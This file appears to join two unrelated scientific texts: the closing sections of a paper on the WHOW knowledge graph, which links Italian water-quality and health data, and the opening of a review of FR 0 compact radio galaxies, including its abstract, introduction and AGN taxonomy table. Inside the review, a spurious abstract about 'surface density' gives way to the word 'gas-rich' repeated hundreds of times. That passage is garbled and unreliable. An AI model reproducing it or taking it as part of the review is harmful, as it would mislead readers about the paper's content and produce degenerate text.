Ministry of Health: [https://www.salute.gov.it/portale/temi/p2_6.jsp?lingua=italiano&id=4464&area=acque_potabili&menu=co](https://www.salute.gov.it/portale/temi/p2_6.jsp?lingua=italiano&id=4464&area=acque_potabili&menu=co). Footnote 37: [https://eur-lex.europa.eu/legal-content/EN/TXT/HTML/?uri=CELEX:32000L0060&rid=2](https://eur-lex.europa.eu/legal-content/EN/TXT/HTML/?uri=CELEX:32000L0060&rid=2). Footnote 38: [http://www.iso.org/iso/catalogue_detail.htm?csnumber=32574](http://www.iso.org/iso/catalogue_detail.htm?csnumber=32574). #### Water Indicator module. The **Water Indicator** ontology, with prefix w-ind:39, re-uses the Indicator ontology design pattern40 defined in OntoPiA41, which is the Italian national network of ontologies and controlled vocabularies. This pattern is re-used to address indicators and metrics for the indicator calculation of water quality. As shown in Figure 5, the indicators can be bathing water quality classes or indicators of lakes' chemical status. Weather Monitoring module.Similarly to the Water Monitoring module, the _Weather Monitoring_ ontology, with prefix wh-mon:42 (cf. Figure 6), has its focus on a wh-mon:WeatherObservation related to a wh-mon:WeatherFeatureOfInterest (either ground-level soil, air, wind, snow or rainfall), wh-mon:WeatherObservableProperty and wh-mon:WeatherSensor hosted by a wh-mon:WeatherStation. It reuses the ISPRA ontology network to model observations and related properties. This model is meant to address the need to represent weather observations that could serve as a basis to derive information on extreme events monitoring and prediction, such as rainfalls and snow levels. Footnote 42: The prefix wh-mon: stands for the namespace [https://w3id.org/whow/onto/weather-monitoring](https://w3id.org/whow/onto/weather-monitoring). Health Monitoring module.Finally, the _Health Monitoring_ ontology, whose prefix is \(\mathtt{hm}\):43 reuses the OntoPiA Indicator ontology and focuses on the representation of health indicators coming from regional healthcare facilities. Examples include drug distribution rates and hospital accesses according to disease code and facility involved (cf. Figure 7). Different types of \(\mathtt{hm}\):HealthcareIndicatorCalculation are defined, based on the typology of indicator they describe, i.e. infectious dis Figure 4: The Water Monitoring ontology. ease rate, death rates related to diagnosis, average hospital stay and drug distribution. The indicator calculation also refers to a statistical dimension class, \(\mathtt{hm:ClinicalCohort}\), which specifies the population referred to as defined by a number of criteria, that is \(\mathtt{hm:CohortCriteriaDescription}\), such as age and gender. By reusing the \(\mathtt{ispra-top}\): ontology, it is also possible to model the health agency that supervises a specific area. Figure 5: The Water Indicator ontology. Figure 6: The Weather Monitoring ontology. ### Linked Open Data We produced the Linked Open Data from two data providers, i.e. ISPRA and ARIA, as reported in Table 1 by executing the RML mapping as described in Section 2.2. Hence, we generated two linked open datasets, that is the one from the data provided by ISPRA and the other from the data provided by ARIA. The ownership of the generated linked datasets along with their corresponding maintenance effort is kept by the data providers. This fits the requirement of WHOW to create and maintain a knowledge graph following a decentralised and distributed paradigm. In this scenario new data providers might publish their data as linked open data compliant with the WHOW ontology network by using their preferred persistent URIs and setting up their own SPARQL endpoint, thus maximising the sustainability of the WHOW-KG. With this regards, ISPRA identified [https://w3id.org/italia/env/ld/](https://w3id.org/italia/env/ld/) as its reference namespace. Accordingly, the pattern [https://w3id.org/italia/env/ld/](https://w3id.org/italia/env/ld/){_type_}/{_id_} was applied for producing RDF resources, where {_type_} and {_id_} are placeholders for an entity type (e.g. water-sample) and its local identifier (e.g. 45.60555-13.72195), respectively. The RDF data produced by ISPRA can be queried through their dedicated SPARQL endpoint44 and are available as a single dump on Zenodo45 for download with a CC-BY 4.0 International licence. Similarly, ARIA identified [https://w3id.org/italia/lombardia/data/](https://w3id.org/italia/lombardia/data/) as its reference namespace. Also in this case, the pattern [https://w3id.org/italia/lombardia/data/](https://w3id.org/italia/lombardia/data/){_type_}/{_id_} was Figure 7: The Health Monitoring ontology. applied for producing RDF resources with the same rationale as before. Again, the RDF data produced by ARIA can be queried via SPARQL46 and are available on Zenodo47 for download with a CC0 licence. Finally, three controlled vocabularies were produced from the data provided by ARIA. This vocabularies provides term definitions for: (i) chemical substances48; (ii) diseases49; and (iii) water indicators50. In the case of controlled vocabularies we opted for a namespace not depending on the specific data provider, i.e. [https://w3id.org/whow/controlled-vocabulary/](https://w3id.org/whow/controlled-vocabulary/). This namespace was used for producing RDF resources by applying the pattern [https://w3id.org/whow/controlled-vocabulary/](https://w3id.org/whow/controlled-vocabulary/){_name_}/{_id_}, where {_name_} and {_id_} are placeholders for the vocabulary name (e.g. chemical-substances) and term local identifier (e.g. cas-102851-06-9), respectively. The controlled vocabularies are available on Zenodo51 and can be queries via SPARQL52. The WHOW-KG counts of 52,943,768 triples in the linked dataset generated by ISPRA, 47,628,449 triples in the linked dataset generated by ARIA, and 16,350 triples available in the controlled vocabularies. Footnote 46: [http://18.102.46.55:18890/sparql](http://18.102.46.55:18890/sparql). Footnote 47: [https://doi.org/10.5281/zenodo.7916732](https://doi.org/10.5281/zenodo.7916732) Footnote 48: [https://github.com/whow-project/semantic-assets/blob/main/controlled-vocabularies/chemical-substances/chemical-substances.ttl](https://github.com/whow-project/semantic-assets/blob/main/controlled-vocabularies/chemical-substances/chemical-substances.ttl). Footnote 49: [https://github.com/whow-project/semantic-assets/blob/main/controlled-vocabularies/diseases/diseases.ttl](https://github.com/whow-project/semantic-assets/blob/main/controlled-vocabularies/diseases/diseases.ttl) Footnote 50: [https://github.com/whow-project/semantic-assets/blob/main/controlled-vocabularies/water-indicators/water-indicators.ttl](https://github.com/whow-project/semantic-assets/blob/main/controlled-vocabularies/water-indicators/water-indicators.ttl). Footnote 51: [https://doi.org/10.5281/zenodo.7919460](https://doi.org/10.5281/zenodo.7919460). Footnote 52: [https://semscout.istc.cnr.it/sparql/](https://semscout.istc.cnr.it/sparql/). Footnote 53: [https://eur-lex.europa.eu/legal-content/EN/TXT/HTML/?uri=CELEX:52019IP0220&from=EN](https://eur-lex.europa.eu/legal-content/EN/TXT/HTML/?uri=CELEX:52019IP0220&from=EN) Footnote 54: [https://blogs.worldbank.org/digital-development/sustainable-development-goals-and-open-data](https://blogs.worldbank.org/digital-development/sustainable-development-goals-and-open-data). ## 4 Impact, versioning, and licensing _Impact._ The UN Sustainable Development Goal (SDG) no. 6 on clean water and sanitation requires to invest in adequate infrastructure, provide sanitation facilities, and encourage hygiene. The importance of considering UN Sustainable Development Goals (SDGs) in the context of open data emerges from several contexts. Notable is the European Parliament resolution of 14 March 2019 on the Annual strategic report on the implementation and delivery of the SDGs (2018/2279(INI))53 where a precise call on the Commission is mentioned in order to add data related to the SDGs to the high-value datasets as defined in the directive on open data and public sector information, encouraging the Member States to publish all reports on the SDGs under a free license. The World Bank Group, in a blog post54 from as far back as 2015, explicitly highlights that "Open Data can help achieve the SDGs by providing critical information on natural resources, government operations, public services, and population demographics". To this end, the WHOW-KG embodies fine-grained thematic indicators that have been identified by data providers and co-creators of the WHOW project according to the three use cases and their legislation bases. We recorded evidences by means of the co-creation programme that the WHOW-KG is of utmost importance to the community encompassing decision makers, practitioners, and data providers in the area of water quality and sanitation. As a matter of fact, 77 individuals contributed to the co-creation programme from different EU countries. Versioning and Licensing.The WHOW-KG is under version control on GitHub55. The ontology network, controlled vocabularies and linked dataset produced by ISPRA are realeased with a CC-BY 4.056 licence. Instead, the linked dataset produced by ARIA is realeased with a CC057 licence. Footnote 55: [https://github.com/whow-project/semantic-assets](https://github.com/whow-project/semantic-assets) Footnote 56: [https://creativecommons.org/licenses/by/4.0/](https://creativecommons.org/licenses/by/4.0/). Footnote 57: [https://creativecommons.org/publicdomain/zero/1.0/](https://creativecommons.org/publicdomain/zero/1.0/) ## 5 Related work In the context of the monitoring a pillar is the Semantic Sensor Network Ontology (SSN Ontology)[7]. It allows one to represent sensors and observational processes and implements, for the majority of its semantic elements, the ISO 19156 Observations and Measurements (O&M) standard, used also as reference model in the INSPIRE context. Other European projects target water monitoring data models. This is the case of the ODALA58 project that created the ODALA Air & Water application profile59. The profile builds on a core module derived from both O&M and the SSN Ontology. ODALA presents concepts similar to those defined in the WHOW water monitoring ontology; this creates the prerequisites for a semantic alignment between these knowledge graphs. In the same direction, [18] describes a knowledge-based approach aiming at water quality monitoring and pollution alerting through the proposed Observational Process Ontology (OPO). Similarly, [9] presents a three-module water quality ontology that combines numerous standards from different domains to obtain a comprehensive approach to the issue. These standards are, among others, GeoSPARQL60, the O&M and SSN cited above, the RDF Data Cube61 as well as non-ontological resources associated with standards (WaterML62). At the European level, the European Environmental Agency publishes a Linked Open Data section63 that comprises data on water quality monitoring. This data is currently under investigation in order to enable possible links with the proposed WHOW knowledge graph. As far as the health domain is concerned, although it is difficult to find (linked) open data available for the re-use, interesting resources were taken into account when creating the WHOW-KG. In particular, we mention here the Snomed standard64 for health terms, that has been re-used in order to create proper links with our produced controlled vocabulary on infectious diseases. Footnote 64: [https://www.snomed.org/](https://www.snomed.org/). In essence, although a variety of works in both domains can be identified, it is still difficult, to the best of our knowledge, to get access to a resource capable of linking the two domains together as we propose with the WHOW-KG. ## 6 Conclusions and future work In this paper, we have introduced the Water Health Knowledge Graph (WHOW-KG) that links water quality observations with health parameters (e.g. infectious disease rates), thus implementing the well-known connection of water quality effects on people's health. The WHOW-KG is (i) distributed among different data providers, (ii) open to maximise re-use, (iii) multilingual in that labels and comments are provided in both Italian and English, when possible, and (iv) built according to FAIR principles, applied to both ontologies and linked open data. The WHOW-KG is continuously evolving with further datasets. The aim, in fact, is to provide a resource that can self-sustain and feed itself beyond the duration of the European WHOW project in which it was conceived. In this context, we are planning a number of activities to further increase the visibility of the knowledge graph and its use for any purpose of interest. Firstly, we are defining SHACL shapes, starting from the OWL restrictions defined in the ontology network, to support the overall validation phase of the proposed methodology. Secondly, in order to open ourselves up to a wider audience of possible developers, part of our future work is to define rest APIs based on the semantics defined through the ontology network. Thirdly, in order to maximise the possibilities of re-use in a wider European context, we will exploit services such as eTranslation65 to provide additional languages for datasets and ontologies, making the knowledge graph understandable to possible stakeholders from different European countries. Finally, the knowledge graph will be made available through a series of national and European platforms. In fact, we plan to publish the linked open datasets in the Italian national catalogue of open data, thanks to the implementation of the DCAT-AP metadata profile, and from there to data.europa.eu. As for the ontologies we are planning to require their inclusion in the Italian national catalogue of semantic assets named schema.gov.it. Footnote 65: [https://commission.europa.eu/resources-partners/etranslation](https://commission.europa.eu/resources-partners/etranslation). ## Acknowledgements This work has been supported by the Water Health Open knoWledge (WHOW) project co-financed by the Connecting European Facility programme of the European Union under grant agreement INEA/CEF/ICT/A2019/206322.
2307.08379
The nature of compact radio sources: the case of FR0 radio galaxies
Radio-loud compact radio sources (CRSs) are characterised by morphological compactness of the jet structure centred on the active nucleus of the galaxy. Most of the local elliptical galaxies are found to host a CRS with nuclear luminosities lower than those of typical quasars, $\lesssim$10$^{42}\, {\rm erg\, s}^{-1}$. Recently, low-luminosity CRSs with a LINER-like optical spectrum have been named Fanaroff-Riley (FR) type 0 to highlight their lack of substantially extended radio emission at kpc scales, in contrast with the other Fanaroff-Riley classes, full-fledged FRIs and FRII radio galaxies. FR0s are the most abundant class of radio galaxies in the local Universe, and characterised by a higher core dominance, poorer Mpc-scale environment and smaller (sub-kpc scale, if resolved) jets than FRIs. However, FR0s share similar host and nuclear properties with FRIs. A different accretion-ejection paradigm from that in place in FRIs is invoked to account for the parsec-scale FR0 jets. This review revises the state-of-the-art knowledge about FR0s, their nature, and which open issues the next generation of radio telescopes can solve in this context.
Ranieri D. Baldi
2023-07-17T10:33:54Z
http://arxiv.org/abs/2307.08379v1
# The nature of compact radio sources: ###### Abstract Radio-loud compact radio sources (CRSs) are characterised by morphological compactness of the jet structure centred on the active nucleus of the galaxy. Most of the local elliptical galaxies are found to host a CRS with nuclear luminosities lower than those of typical quasars, \(\la\)\(10^{42}\,{\rm erg\,s^{-1}}\). Recently, low-luminosity CRSs with a LINER-like optical spectrum have been named Fanaroff-Riley (FR) type 0 to highlight their lack of substantially extended radio emission at kpc scales, in contrast with the other Fanaroff-Riley classes, full-fledged FR Is and FR II radio galaxies. FR 0s are the most abundant class of radio galaxies in the local Universe, and characterised by a higher core dominance, poorer Mpc-scale environment and smaller (sub-kpc scale, if resolved) jets than FR Is. However, FR 0s share similar host and nuclear properties with FR Is. A different accretion-ejection paradigm from that in place in FR Is is invoked to account for the parsec-scale FR 0 jets. This review revises the state-of-the-art knowledge about FR 0s, their nature, and which open issues the next generation of radio telescopes can solve in this context. Keywords:Galaxies: active Galaxies: jets Radio continuum: galaxies + Footnote †: journal: The Astronomy and Astrophysics Review ###### Abstract We present a new method for estimating the surface density of the gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich-rich gas-rich gas-rich gas-rich gas-rich-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich gas-rich-rich edge-brightened as type II (FR IIs): the latter generally more radio luminous (\(>2\times 10^{25}\,{\rm W\,Hz}^{-1}\) at 178 MHz) than the former. Extended plumes, lobes, and tails account for typically 90% of their total radio emission (Miley, 1980). Other than the radio linear size and morphology, the jet orientation with respect to the line of sight is another important variable to characterise RLAGN: extended sources inclined at small angles may appear compact due to projection effects and their radio emission can be boosted due to relativistic beaming of the nuclear jets moving at relativistic velocities. A further crucial aspect of RLAGN is the radio spectrum (flux density \(S_{\nu}\), varies with frequency \(\nu\) as \(\nu^{-\alpha}\) and \(\alpha\) is the spectral index): steep-spectrum sources (\(\alpha>0.5\)) are typically associated with optically-thin emission from extended jets, while flat/inverted-spectrum sources (\(\alpha<0.5\)) are largely due to (synchrotron-self or free-free) absorption process involved in compact cores and jet knots. While misaligned (type-2) RLAGN (with respect to the line of sight, e.g. FR I/II), commonly named as radio galaxies (RGs), are typically dominated by their extended emission with steep spectra, aligned (type-1) RLAGN, named blazars2, show flat, inverted or complex radio spectra of the dominant cores. Footnote 2: The blazar population consists in two sub-classes, the flat-spectrum radio quasars and BL Lacs, generally at high and low luminosities, respectively.) Traditionally, compact radio sources (CRSs) associated with misaligned RLAGN are believed to represent the early stages of evolution of full-fledged RLAGN (FR I/IIs, O'Dea 1998) and are characterised by a peaked radio spectrum (see Sect. 2). Recently, Baldi et al. (2015) introduced a new class of _low-power CRSs_ (\(\lesssim 10^{24}\,{\rm W\,Hz}^{-1}\)), named _FR 0_ RGs, whose compact radio emission is dominated by the core and pc-scale jets and not related to a juvenile radio activity. The characteristic property of such an abundant class of RGs is the substantial lack of kpc-scale jet emission, that has changed the classical view on the kpc/Mpc-scale RLAGN phenomenology, particularly at low luminosities, where jets are scarcely studied. An increasingly-incomplete list of RLAGN classes is given in Table 1. The complex radio taxonomy of RLAGN needs to find a correspondence with the optical classification schemes to modes of accretion onto the BHs (e.g., Jackson and Rawlings, 1997; Heckman and Best, 2014; Hardcastle and Worrall, 2000). Based on their optical spectra, RGs have been classified into Low Excitation Radio Galaxies (LERGs) and High Excitation Radio Galaxies (HERGs) (Tab. 1), which basically reflect two BH accretion states (Buttiglione et al., 2010; Tadhunter, 2016a) with distinct distributions of Eddington ratios3. LERGs are typically accreting below 1% of their Eddington accretion rate limit, while HERGs have typical accretion rates between 1 and 10% (or even higher) (Heckman and Best, 2014). HERGs, accretion-dominated RLAGN, are characterized by radiatively efficient accretion flows (REAF), i.e. standard optically thick, geometrically thin discs (Shakura and Sunyaev, 1973). LERGs, jet-dominated RLAGN, are powered by radiatively inefficient accretion flows (RIAF), which include the disc solutions of geometrically thick advection dominated accretion flows (ADAF) (e.g., Narayan and Yi 1994a, 1995; Narayan et al. 2000; Yuan and Narayan 2014). LERGs prefer redder, gas-poorer, more massive ETGs with lower star-formation rates, which inhabit richer and more dynamically relaxed environment and feed more massive BHs than HERGs (Baldi and Capetti, 2008; Heckman and Best, 2014). LERGs are generally thought to be fuelled by the cooling of hot gas from haloes present in their massive host galaxies, whereas the HERGs generally tend to accrete cold gas efficiently, from processes external or internal to the galaxy (Hardcastle et al., 2007). Several radio-optical studies of RGs concluded that the two FR radio morphologies are not representative of two distinct accretion states, but can co-exist in the same optical class (e.g., Gendre et al. 2013; Mingo et al. 2019, 2022). In fact, local LERGs are associated with a FR I or FR II morphology, whereas HERGs, which are on average of higher luminosity, are generally FR IIs. The new low-power FR 0 class has thus further entangled, although already complex, the radio-optical classification scheme (Tab. 1). Other than radio and optical bands, decades of observations of accreting BHs at different wavelengths have shed new light on specific aspects of \begin{table} \begin{tabular}{l l r} \hline Acronyms & Main properties & Reference \\ \hline Quasar & Quasi-stellar radio source & 1 \\ RLAGN & radio-loud AGN (relativistic collimated jets) & 2 \\ RQAGN & radio-quiet AGN (thermal/non-thermal emission, uncollimated & 2,3 \\ & sub-relativistic jet) & \\ CRS & RL or RQ radio compact source & 4 \\ FR I & Fanaroff–Riley class I radio source; radio core-brightened & 5 \\ FR II & Fanaroff–Riley class II radio source; radio edge-brightened & 5 \\ FR 0 & Fanaroff–Riley class 0 radio source; RL CRS lacking kpc-scale extended emission & 6 \\ RG & Radio galaxy, misaligned RL AGN & 7 \\ Blazar & aligned RL AGN & 7 \\ REAF & radiatively-efficient accretion disc & 8 \\ RIAF & radiatively-inefficient accretion disc & 9 \\ LERG & Low-Excitation Radio galaxies & 10 \\ HERG & High-Excitation Radio galaxies & 10 \\ LLAGN & Low-luminosity AGN & 11 \\ CSS & Compact steep spectrum radio source; young RG & 12 \\ GPS & Gigahertz-peaked radio source; young RG & 12 \\ HPF & High frequency peakers; young RG & 12 \\ CSO & Compact symmetric object; young RG & 12 \\ MSO & Medium-sized symmetric object; young RG & 12 \\ Seyfert & High-ionisation nuclear emission-line regions, RQ AGN & 13 \\ LINER & Low-ionisation nuclear emission-line regions, RQ or RL AGN & 13,14 \\ CoreG & Core Galaxies, nearby low-luminosity FR 0-like RGs & 15 \\ \hline \end{tabular} The complex radio-optical AGN taxonomy includes several acronyms. Here a partial but helpful list of labels for AGN, their properties and references (first/key papers or recent papers, which give up-to-date details). References: 1. Schmidt (1963), 2. Padovani (2016), 3. Panessa et al. (2019), 4. Kellermann and Pauliny-Toth (1981), 5. Fanaroff and Riley (1974), 6. Baldi et al. (2015), 7. Urry and Padovani (1995), 8. Shakura and Sunyaev (1973) 9. Yuan and Narayan (2014), 10. Heckman and Best (2014), 11. Ho (2008), 12. O’Dea and Saikia (2021), 13. Kewley et al. (2006), 14. Heckman (1980), 15. Balmaverde and Capetti (2006a). \end{table} Table 1: Radio-optical AGN taxonomy the accretion-jet phenomena (e.g. X-ray, broad/narrow optical lines, IR excess), collecting evidence for an anisotropic AGN emission. The attempt to unify all the AGN classes in one single picture concluded with the Unification Model (UM, e.g. Barthel, 1989; Antonucci, 1993; Urry and Padovani, 1995), which states that, despite their differences, RLAGN have the same basic structure (attested for powerful sources): optically-thick circumnuclear matter (torus) obscuring the accretion disc in an edge-on view, perpendicular to a relativistic jet, Doppler boosted when seen at small angles to the line of sight. This orientation-based scheme represents the most courageous way to characterise the fact that the nuclear continuum and emission-line radiation from all types of AGN are simply a function of wavelength, inclination to the line of sight and source luminosity. However, the advent of modern sensitive and Figure 1: Radio power/linear-size plot (\(P\)—\(D\) diagram) for different types of RL and RQ AGN, adapted from plots presented by An and Baan (2012); Jarvis et al. (2019); Hardcastle and Croston (2020). Points show individual objects and coloured contours represent a smoothed estimator of source density. The different categories of source shown are: CSO, GPS, CSS, FR I, FR II, RQ quasars, Seyferts and LINERS, and FR 0s (see 